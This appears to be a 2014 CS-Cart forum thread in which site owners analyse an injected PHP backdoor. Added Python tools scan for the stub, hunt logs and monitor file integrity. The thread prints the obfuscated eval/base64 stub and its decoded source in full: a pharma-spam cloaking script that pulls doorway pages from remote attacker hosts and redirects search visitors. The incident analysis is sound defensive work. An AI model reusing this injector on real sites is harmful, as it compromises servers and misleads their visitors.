Wordpress hacker attack, CS-Cart can be affected

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 10:32 AM #1

Two of my sites were hacked today.

One is running 4.1.3 the other 4.1.5.

Development sites running on the same server were not hacked, and the hacks resulted in "500 Server Error" and were thus not functional.

I am therefore thinking that this is a front end attack, not shell access.

The files modified were all in the Tygh directory. You can identify the exact files hacked by going through the apache2 error.log and seeing which file breaks the server (e.g. Database.php). This is what is appended to the first line of the affected php files:

<?php eval(gzinflate(base64_decode('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')));?>

I am running PHP 5.5 and Apache 2.4 and presently have mod_security disabled. That is getting corrected as I speak.
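
Added example (not from vmajor's post and not CS-Cart code): a Python scanner for the injection pattern described above. It looks for the `eval(gzinflate(base64_decode('...')))` stub on the first line of every .php file, decodes the payload the way PHP's base64_decode()/gzinflate() pair would (gzinflate is raw DEFLATE, so zlib is called with wbits=-15), and can strip the stub to restore the original file. The directory layout, file contents and the harmless stand-in payload built in demo() are constructed for the example; build_stub() exists only to create that fixture.

```python
"""Find PHP files whose first line carries the eval(gzinflate(base64_decode(...)))
stub, decode the payload and restore the file. Example code added to the thread,
not the poster's tooling; all paths and contents in demo() are constructed."""
import base64
import os
import re
import tempfile
import zlib

# The stub the poster found on line 1: <?php eval(gzinflate(base64_decode('...')));?>
INJECT_RE = re.compile(
    r"<\?php\s*eval\(gzinflate\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)\);\s*\?>"
)


def decode_gzinflate_payload(b64: str) -> str:
    """Undo base64, then gzinflate. PHP's gzinflate() reads raw DEFLATE with no
    zlib header, which zlib.decompress accepts with wbits=-15."""
    return zlib.decompress(base64.b64decode(b64), -15).decode("utf-8", "replace")


def build_stub(php_code: str) -> bytes:
    """Build the same kind of stub (used here only to make a test fixture)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, as gzdeflate() does
    raw = comp.compress(php_code.encode("utf-8")) + comp.flush()
    return b"<?php eval(gzinflate(base64_decode('" + base64.b64encode(raw) + b"')));?>"


def inspect_php_file(path: str):
    """Return (decoded payload, file bytes with the stub removed) when line 1 of
    `path` starts with the stub, otherwise None."""
    with open(path, "rb") as fh:
        data = fh.read()
    first_line, sep, rest = data.partition(b"\n")
    # latin-1 maps one byte to one character, so regex offsets are byte offsets
    m = INJECT_RE.match(first_line.decode("latin-1"))
    if m is None:
        return None
    restored = first_line[m.end():] + sep + rest
    return decode_gzinflate_payload(m.group(1)), restored


def scan_tree(root: str) -> dict:
    """Map every infected .php file under root to its decoded payload."""
    infected = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.normpath(os.path.join(dirpath, name))
                hit = inspect_php_file(full)
                if hit is not None:
                    infected[full] = hit[0]
    return infected


def strip_stub(path: str) -> bool:
    """Rewrite the file without the stub; True if the file was changed.
    Keep a copy of the infected file first, the decoded payload is evidence."""
    hit = inspect_php_file(path)
    if hit is None:
        return False
    with open(path, "wb") as fh:
        fh.write(hit[1])
    return True


def demo() -> dict:
    """Constructed tree with one infected file, scanned and cleaned."""
    root = tempfile.mkdtemp(prefix="tygh-")
    os.makedirs(os.path.join(root, "app", "Tygh"))
    infected_path = os.path.normpath(os.path.join(root, "app", "Tygh", "Database.php"))
    clean_path = os.path.join(root, "app", "Tygh", "Registry.php")
    original = b"<?php\nnamespace Tygh;\nclass Database {}\n"
    with open(clean_path, "wb") as fh:
        fh.write(original)
    # Harmless stand-in for the real payload (which starts with the same guard)
    payload = "if (!defined('frmDs')) { define('frmDs', 1); }"
    with open(infected_path, "wb") as fh:
        fh.write(build_stub(payload) + original)  # stub glued onto line 1
    found = scan_tree(root)
    cleaned = strip_stub(infected_path)
    with open(infected_path, "rb") as fh:
        restored = fh.read() == original
    return {
        "infected": sorted(os.path.relpath(p, root).replace(os.sep, "/") for p in found),
        "payload": found.get(infected_path),
        "cleaned": cleaned,
        "restored": restored,
        "clean_untouched": strip_stub(clean_path) is False,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Run scan_tree() against the document root of a suspect site and keep the decoded payloads; the error.log approach in the post only finds the files that happened to break, while the scanner also finds injected files that still parse.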

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 11:28 AM #2

Sites just got hacked again...while I was installing modsecurity 2.8. Modsecurity is now up and running. Let's see if that helps.

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 12:27 PM #3

I have decoded the payload. This is what the hacker(s) attempted to inject. It is a bit late here so I cannot focus too well, but it seems to be some kind of link spam/traffic scam link. It also seems to target WordPress; it is not CS Cart specific, so also check your WordPress sites.

if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);

function frm_dl ($url) {
  if (function_exists('curl_init')) {
   $ch = curl_init($url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $out = curl_exec ($ch);
   if (curl_errno($ch) !== 0) $out = false;
   curl_close ($ch);
  } else {$out = @file_get_contents($url);}
  return trim($out);
}

function frm_crpt($in){
  $il=strlen($in);$o='';
  for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
  return $o;
}

function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
  $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
  $fe = file_exists($f);
  if(!$fe || time() - filemtime($f) > 60 * $cmtime)
  {
   $dlc=frm_dl($link);
   if($fe && $dlc===false)
	@touch($f);
   else
   {
	if($fe && empty($dlc) && $toe)
	{
	 @touch($f);
	}
	else
	{
	 if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
	 else{return $dlc;}
	}
   }
  }
  $fc = @file_get_contents($f);
  return ($fc)?frm_crpt($fc):'';
}

function frm_isbot(){
  $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
  if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
  $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
	 array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
	 array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
  foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
  if(!$ua)return true;
  $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
  foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
  $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
  $hba=array('google','msn','yahoo');
  if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
  return false;
}

function frm_tmpdir(){
  $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
		foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
			if ($t = getenv($v)) {$fs[]=$t;}
		}
		if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
		$fs[]='.';
	  
		foreach ($fs as $f){
		 $tf = $f.'/'.md5(rand());
		 if($fp = @fopen($tf, 'w')){
		  fclose($fp);
		  unlink($tf);
		  return $f;
		 }
		}
  return false;
}
function frm_seref(){
  $r = @strtolower($_SERVER["HTTP_REFERER"]);
  $ses = array('google','bing','yahoo','ask','aol');
  foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
  return false;
}

function frm_havekey($s=false){
  $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
  $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
  if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
  foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
  return '';
}

function frm_strtonum($Str, $Check, $Magic) {
  $Int32Unit = 4294967296;
  $length = strlen($Str);
  for ($i = 0; $i < $length; $i++) {
   $Check *= $Magic;
   if ($Check >= $Int32Unit) {
	$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
	$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
   }
   $Check += ord($Str{$i});
  }
  return $Check;
}
function frm_chhash($String) {
  $Check1 =frm_strtonum($String, 0x1505, 0x21);
  $Check2 = frm_strtonum($String, 0, 0x1003F);
  $Check1 >>= 2;
  $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
  $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
  $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
  $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
  $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
  $Hashnum = ($T1 | $T2);
  $CheckByte = 0;
  $Flag = 0;
  $HashStr = sprintf('%u', $Hashnum) ;
  $length = strlen($HashStr);
  for ($i = $length - 1;  $i >= 0;  $i --) {
   $Re = $HashStr{$i};
   if (1 === ($Flag % 2)) {
	$Re += $Re;
	$Re = (int)($Re / 10) + ($Re % 10);
   }
   $CheckByte += $Re;
   $Flag ++;
  }
  $CheckByte %= 10;
  if (0 !== $CheckByte) {
   $CheckByte = 10 - $CheckByte;
   if (1 === ($Flag % 2) ) {
	if (1 === ($CheckByte % 2)) {
	 $CheckByte += 9;
	}
	$CheckByte >>= 1;
   }
  }
  return '7'.$CheckByte.$HashStr;
}

function frm_chpr($url,$td){
  $ch=frm_chhash($url);
  $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
  if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}

function frm_red($k){
  if(!frm_isbot() && frm_seref()){
   $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
   $s=@urlencode($_SERVER['HTTP_REFERER']);
   die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
  }
}

$tdir = frm_tmpdir();
$isb=frm_isbot();
$k=frm_havekey();
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
  $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
  $sp = "http://bpiiflhbw.ontheweb.nu/stat/feed.php?pa=$parg&h=$host";
  //
  $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  if($isb && ($ppr = frm_chpr($tp)) > 1){
   $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
   if($pc) die($pc);
  }
  //
  $ruri = strtolower($_SERVER['REQUEST_URI']);
  $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
  if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
   frm_red($k);
   die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
  }
  if (($ruri=='/' || $ruri=='/index.php') && $isb) {
   $c=frm_getcache($tdir, $sp ,60*24);
   if($c)die($c);
  }
  //
  if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
   if(strpos($sdl, '|'.$ruri.'|') !== false){
	frm_red($k);
	die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
   }
  }
}
if($k) frm_red($k);
}
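
Added example (not from vmajor's post and not CS-Cart code): a Python log hunt based on the decoded script above. The script derives a three-letter GET parameter from the site's hostname (the `$parg` line) and serves cached spam for `/?<parg>=<n>` and `/index.php?<parg>=<n>`, and it redirects visitors who arrive from a search engine with one of the pharma keywords in the referer or URI (frm_seref, frm_havekey, frm_red). spam_param() recomputes that parameter for a given host, and find_hits() flags matching requests in Apache combined-format access-log lines. The hostname and the log lines in demo() are constructed; the keyword list is a subset of the one in frm_havekey().

```python
"""Recompute the per-host spam parameter from the decoded script and look for
the requests it serves in access logs. Example code added to the thread; the
host and log lines in demo() are constructed."""
import base64
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

SEARCH_ENGINES = ("google", "bing", "yahoo", "ask", "aol")  # as in frm_seref()
# Subset of the frm_havekey() list; extend it with the full list from the script.
KEYWORDS = ("viagra", "cialis", "levitra", "kamagra", "propecia", "sildenafil", "tadalafil")

# Apache combined log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def spam_param(host: str) -> str:
    """Port of the script's $parg derivation:
    substr(preg_replace('/[^a-z]+/','',strtolower(base64_encode(md5($host.'p1')))),0,3)
    PHP's md5() returns the lowercase hex digest, and that text is base64-encoded."""
    host = re.sub(r"^www\.", "", host.lower())  # preg_replace('/^w{3}\./','',...)
    hexdigest = hashlib.md5((host + "p1").encode()).hexdigest()
    b64 = base64.b64encode(hexdigest.encode()).decode().lower()
    return re.sub(r"[^a-z]+", "", b64)[:3]


def is_spam_page_request(target: str, parg: str) -> bool:
    """The branch that serves a cached spam page: URI starts with /? or
    /index.php? and $_GET[$parg]*1 is positive."""
    t = target.lower()
    if not (t.startswith("/?") or t.startswith("/index.php?")):
        return False
    for value in parse_qs(urlsplit(t).query).get(parg, []):
        m = re.match(r"\d+", value)  # PHP's "12abc"*1 == 12
        if m and int(m.group()) > 0:
            return True
    return False


def from_search_engine(referer: str) -> bool:
    r = referer.lower()
    return any(se + "." in r for se in SEARCH_ENGINES)


def pharma_keyword(referer: str, target: str):
    """frm_havekey(): keyword search over HTTP_REFERER . REQUEST_URI."""
    hay = (referer + target).lower()
    for k in KEYWORDS:
        if re.search(r"(\b|_)%s(\b|_)" % re.escape(k), hay):
            return k
    return None


def find_hits(lines, host: str) -> list:
    """Flag log lines that look like the script's spam-page or redirect branch."""
    parg = spam_param(host)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target, referer = m["target"], m["referer"]
        if is_spam_page_request(target, parg):
            hits.append({"ip": m["ip"], "target": target, "reason": "spam page"})
        elif from_search_engine(referer) and pharma_keyword(referer, target):
            hits.append({"ip": m["ip"], "target": target, "reason": "search redirect"})
    return hits


HOST = "shop.example"  # constructed


def demo() -> list:
    p = spam_param(HOST)
    lines = [  # constructed log lines
        f'66.249.66.1 - - [03/Jun/2014:10:12:01 +0200] "GET /?{p}=12 HTTP/1.1" 200 5120 "-" '
        '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
        '198.51.100.7 - - [03/Jun/2014:10:15:42 +0200] "GET /index.php?dispatch=products.view'
        '&product_id=viagra-100mg HTTP/1.1" 200 811 "http://www.google.com/search?q=buy+viagra" '
        '"Mozilla/5.0 (Windows NT 6.1)"',
        '203.0.113.9 - - [03/Jun/2014:10:16:03 +0200] "GET /index.php?dispatch=products.view'
        '&product_id=42 HTTP/1.1" 200 14020 "http://www.google.com/" "Mozilla/5.0"',
    ]
    return find_hits(lines, HOST)


if __name__ == "__main__":
    print("spam parameter for", HOST, "is", spam_param(HOST))
    for hit in demo():
        print(hit)
```

The first flagged line is what a crawler sees (the doorway page); the second is the visitor the script would bounce to the redirect host. Ordinary search traffic without a keyword is not flagged. A site that is still infected can also be checked directly by requesting `/?<parg>=1` with a Googlebot User-Agent and comparing the response with a normal fetch.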


 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 03 June 2014 - 12:34 PM #4

I have decoded the payload. This is what the hacker(s) attempted to inject:

$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');

Bad news here, are they hacking a Wordpress install?

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 12:40 PM #5

Yea :-) It seems that it is either not CS Cart specific or that it actually expects WordPress, but its injection method seems to be CMS agnostic. Thus it may be targeting a platform vulnerability. I find this a bit disturbing since we are on the latest updates branch for Apache 2.4 and PHP 5.5.

 
  • imac
  • Head of Product
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 2074 posts

Posted 03 June 2014 - 01:21 PM #6

Guys, I nearly fainted when I saw the thread title(
I hope you do not mind if I rename it.
Ilya Makarov,
CS-Cart Architect Team

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 01:37 PM #7

Well, CS Cart was affected. It is not a "can be". Both 4.1.3 and 4.1.5 were taken down, twice. It does appear that the target is Wordpress and that when the CS Cart php files are hacked the result is "500 Server Error" rather than the intended bounty of spam.

Nevertheless this is rather serious as I only managed to recover the sites because I had local backups.

 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11362 posts

Posted 03 June 2014 - 07:40 PM #8

Guys, just because cs-cart was affected DOES NOT MEAN that cs-cart itself is vulnerable.

If the entry point is outside of cs-cart, then file ownership/permissions are to blame or the "site account" has been compromised.

What are the ownerships and permissions of the affected files and the parent directory?

Please be cautious of claims. Everyone is very sensitized to security right now (good thing) and you must be sure of claims before they are made.

And again, if you were monitoring files on a daily (or more frequent) basis, then you would be aware that a file like Database.php had been modified.

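
Added example (not from tbirnseth's post and not CS-Cart code): the kind of file monitoring recommended above, in Python. build_baseline() records a SHA-256, size, owner and permission bits for every file under the document root, save_baseline() stores that outside the web root, and compare() reports files that were modified, added or removed since the baseline, files whose mode or owner changed, and files that are world-writable (the ownership/permission question asked in the post). The tree, file contents and the simulated changes in demo() are constructed; the stub written into Database.php there is a placeholder, not a real payload.

```python
"""Baseline-and-compare file integrity check for a web root. Example code
added to the thread, not a CS-Cart tool; everything in demo() is constructed."""
import hashlib
import json
import os
import stat
import tempfile


def file_record(path: str) -> dict:
    """SHA-256 of the content plus the owner and permission bits."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    st = os.stat(path)
    return {"sha256": digest.hexdigest(), "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid, "size": st.st_size}


def build_baseline(root: str) -> dict:
    """Relative path -> record for every file under root."""
    records = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            records[rel] = file_record(full)
    return records


def save_baseline(records: dict, path: str) -> None:
    # Store this outside the web root (or off-box); an attacker who can write
    # Database.php can also rewrite a baseline kept next to it.
    with open(path, "w") as fh:
        json.dump(records, fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def compare(baseline: dict, current: dict) -> dict:
    """What changed since the baseline, plus files anyone on the box can write."""
    both = set(baseline) & set(current)
    return {
        "modified": sorted(p for p in both
                           if baseline[p]["sha256"] != current[p]["sha256"]),
        "mode_changed": sorted(p for p in both
                               if (baseline[p]["mode"], baseline[p]["uid"])
                               != (current[p]["mode"], current[p]["uid"])),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "world_writable": sorted(p for p, r in current.items()
                                 if r["mode"] & stat.S_IWOTH),
    }


def demo() -> dict:
    """Take a baseline of a constructed tree, simulate an incident, compare."""
    root = tempfile.mkdtemp(prefix="webroot-")
    state = tempfile.mkdtemp(prefix="fim-")  # baseline lives outside the web root

    def write(rel, data, mode=0o644):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
        os.chmod(full, mode)
        return full

    db = write("app/Tygh/Database.php", b"<?php\nnamespace Tygh;\nclass Database {}\n")
    reg = write("app/Tygh/Registry.php", b"<?php\nnamespace Tygh;\nclass Registry {}\n")
    cfg = write("config.local.php", b"<?php\n$config = array();\n", 0o640)
    baseline_file = os.path.join(state, "baseline.json")
    save_baseline(build_baseline(root), baseline_file)

    # Simulated incident: stub glued onto line 1 of Database.php (placeholder
    # text, not a payload), a file dropped into images/, a file made
    # world-writable and a file removed.
    with open(db, "rb") as fh:
        original = fh.read()
    with open(db, "wb") as fh:
        fh.write(b"<?php eval(gzinflate(base64_decode('...')));?>" + original)
    write("images/.cache.php", b"<?php /* dropped */\n")
    os.chmod(reg, 0o666)
    os.remove(cfg)

    return compare(load_baseline(baseline_file), build_baseline(root))


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Run build_baseline() right after a clean install or upgrade, store the JSON off the web root, and compare from cron; anything in `modified` or `added` under app/ or Tygh/ between upgrades is worth a look the same day, not after the site returns a 500.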


 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 10:54 PM #9

True, I do not know the entry point for this particular hack. The shell/user was not compromised, of that I am fairly certain as I went through a pretty thorough process verifying this. Besides the system is...um, trapped. Brute force will not work.

I also investigated the hack more thoroughly, but I have not finished yet. The hack is a variant of this: http://codinginpubli...jection-script/

